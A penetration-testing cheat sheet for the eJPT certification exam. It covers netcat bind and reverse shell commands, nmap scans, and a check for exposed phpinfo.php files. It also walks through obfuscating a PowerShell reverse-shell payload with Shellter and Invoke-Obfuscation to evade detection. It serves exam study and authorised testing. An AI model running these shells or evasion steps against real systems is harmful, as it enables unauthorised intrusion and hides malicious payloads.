eJPT-CheatSheets
Bartosz Pokrywka
Useful info and commands for the eJPT certification exam
Netcat can be used for:
- Banner Grabbing
- Port Scanning
- Transferring Files
- Bind/Reverse Shells
Setup listener:
> nc -nvlp <port>
Setup connection:
> nc -nv <IP> <port>
The downside of a bind shell is that a firewall on the target will probably block the incoming connection.
Target system:
> .\nc.exe -nvlp <port> -e cmd.exe
Attacker system:
> nc -nv <IP> <port>
OR
Target system:
> nc -nvlp <port> -c /bin/bash
Attacker system:
> .\nc.exe -nv <IP> <port>
Better option (reverse shell): Attacker (Netcat listener) <---- Target (Netcat client)
Target system (connects back to the attacker's IP and port):
> .\nc.exe -nv <IP> <port> -e cmd.exe
Attacker system:
> nc -nvlp <port>
Basic version scan:
> nmap <IP> -sV
10k ports scan:
> nmap <IP> -T4 -PA -sC -sV -p 1-10000 -oX nmap_10k
Scan UDP ports:
> nmap <IP> -sU -sV
Sometimes there is an exposed file on the web server:
> phpinfo.php
Look for it...
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
> https://www.shellterproject.com
> sudo apt install shellter -y
It requires Wine.
> sudo wine shellter.exe
Invoke-Obfuscation is an open source PowerShell v2.0+ compatible PowerShell command and script obfuscator.
GitHub Repo:
> https://github.com/danielbohannon/Invoke-Obfuscation
On Linux you need to install PowerShell for this.
> sudo apt install powershell -y
As the payload use for example:
> https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#powershell
To load it:
> SET SCRIPTPATH /path/to/your/shell.ps1
Choose an option such as AST (or any other you like).
There are several AST options; you can choose ALL ;)
You can also encode it:
> ENCODE
For ASCII choose:
> 1
Then copy the result into a file such as "obfuscated.ps1"...